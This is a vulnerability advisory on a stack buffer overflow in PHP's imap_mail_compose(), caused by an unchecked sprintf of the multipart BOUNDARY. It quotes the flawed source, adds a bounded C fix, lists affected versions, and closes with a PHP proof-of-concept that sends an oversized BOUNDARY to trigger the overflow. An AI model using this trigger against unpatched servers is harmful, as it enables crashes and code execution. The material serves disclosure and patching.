BUGTRAQ ID: 23234
PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML.
PHP's imap_mail_compose() function contains a buffer overflow in its implementation; a local attacker may exploit it to escalate privileges.
The imap_mail_compose() function builds multipart messages in a fixed-size stack buffer named tmp:
PHP_FUNCTION(imap_mail_compose)
{
    …
    char tmp[8 * MAILTMPLEN], *mystring=NULL, *t=NULL, *tempstring=NULL;
When building a multipart message, the BOUNDARY is first read from the input parameters and then copied into the stack buffer with an sprintf call, without any size check:
if (bod && bod->type == TYPEMULTIPART) {
    /* first body part */
    part = bod->nested.part;
    /* find cookie */
    for (param = bod->parameter; param && !cookie; param = param->next) {
        if (!strcmp (param->attribute, "BOUNDARY")) {
            cookie = param->value;
        }
    }
    /* yucky default */
    if (!cookie) {
        cookie = "-";
    }
    /* for each part */
    do {
        t=tmp;
        /* build cookie */
        sprintf (t, "--%s%s", cookie, CRLF);
This allows the buffer to be overwritten, leading to execution of arbitrary instructions.
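Added example (not PHP's code and not the project's actual patch): a bounded replacement in C for the sprintf call shown above, which rejects a BOUNDARY that cannot fit in tmp before writing a single byte. It assumes the c-client value MAILTMPLEN = 1024, so tmp is 8192 bytes, which is what the 8192-byte BOUNDARY in the proof of concept on this page overflows.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Buffer geometry from the vulnerable function. MAILTMPLEN is assumed to be
 * the c-client value 1024, so tmp is 8192 bytes: an 8192-byte BOUNDARY plus
 * the "--" prefix and CRLF can never fit. */
#define MAILTMPLEN 1024
#define TMPLEN (8 * MAILTMPLEN)
#define CRLF "\r\n"

/* Bounded replacement for sprintf(t, "--%s%s", cookie, CRLF).
 * Returns the number of bytes written, or -1 if the line would not fit;
 * on failure nothing is written, so the caller's buffer stays intact. */
int build_boundary_line(char *dst, size_t dstlen, const char *cookie)
{
    if (!cookie) {
        cookie = "-";                       /* same default as the original */
    }
    /* "--" + cookie + CRLF + terminating NUL must all fit in dst */
    size_t needed = 2 + strlen(cookie) + strlen(CRLF) + 1;
    if (dstlen == 0 || needed > dstlen) {
        return -1;
    }
    int n = snprintf(dst, dstlen, "--%s%s", cookie, CRLF);
    if (n < 0 || (size_t)n >= dstlen) {
        return -1;                          /* never accept silent truncation */
    }
    return n;
}

/* Runs the check against a BOUNDARY of `len` repeated 'A's, the shape used
 * by the proof of concept. Returns 1 if accepted, 0 if rejected. */
int boundary_accepted(size_t len)
{
    char *cookie = malloc(len + 1);         /* constructed test input */
    if (!cookie) return 0;
    memset(cookie, 'A', len);
    cookie[len] = '\0';
    char tmp[TMPLEN];
    int n = build_boundary_line(tmp, sizeof tmp, cookie);
    free(cookie);
    return n >= 0;
}

int main(void)
{
    printf("16-byte BOUNDARY:   %s\n", boundary_accepted(16) ? "accepted" : "rejected");
    printf("8192-byte BOUNDARY: %s\n", boundary_accepted(8192) ? "accepted" : "rejected");
    return 0;
}
```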
Affected versions:
PHP PHP 5.1.6
PHP PHP 5.1.5
PHP PHP 5.1.4
PHP PHP 5.1.3
PHP PHP 5.1.2
PHP PHP 5.1.1
PHP PHP 5.1
PHP PHP 5.0.5
PHP PHP 5.0.4
PHP PHP 5.0.3
Upgrade to the latest version:
PHP PHP 5.2
* PHP PHP 5.2.1
http://www.php.net/downloads.php#v5
PHP PHP 4.4.4
* PHP PHP 4.4.5
http://www.php.net/downloads.php#v4
<?php
// Envelope of the message to compose (addresses as given on the page)
$envelope["from"] = "[email protected]";
$envelope["to"] = "[email protected]";
// Multipart container whose BOUNDARY parameter is 8192 bytes long,
// larger than the fixed-size tmp stack buffer in imap_mail_compose()
$part1["type"] = TYPEMULTIPART;
$part1["subtype"] = "mixed";
$part1["type.parameters"] = array("BOUNDARY" => str_repeat("A",8192));
// Ordinary text part that follows the container
$part2["type"] = TYPETEXT;
$part2["subtype"] = "plain";
$part2["description"] = "description3";
$part2["contents.data"] = "contents.data3\n\n\n\t";
$body[1] = $part1;
$body[2] = $part2;
imap_mail_compose($envelope, $body);
?>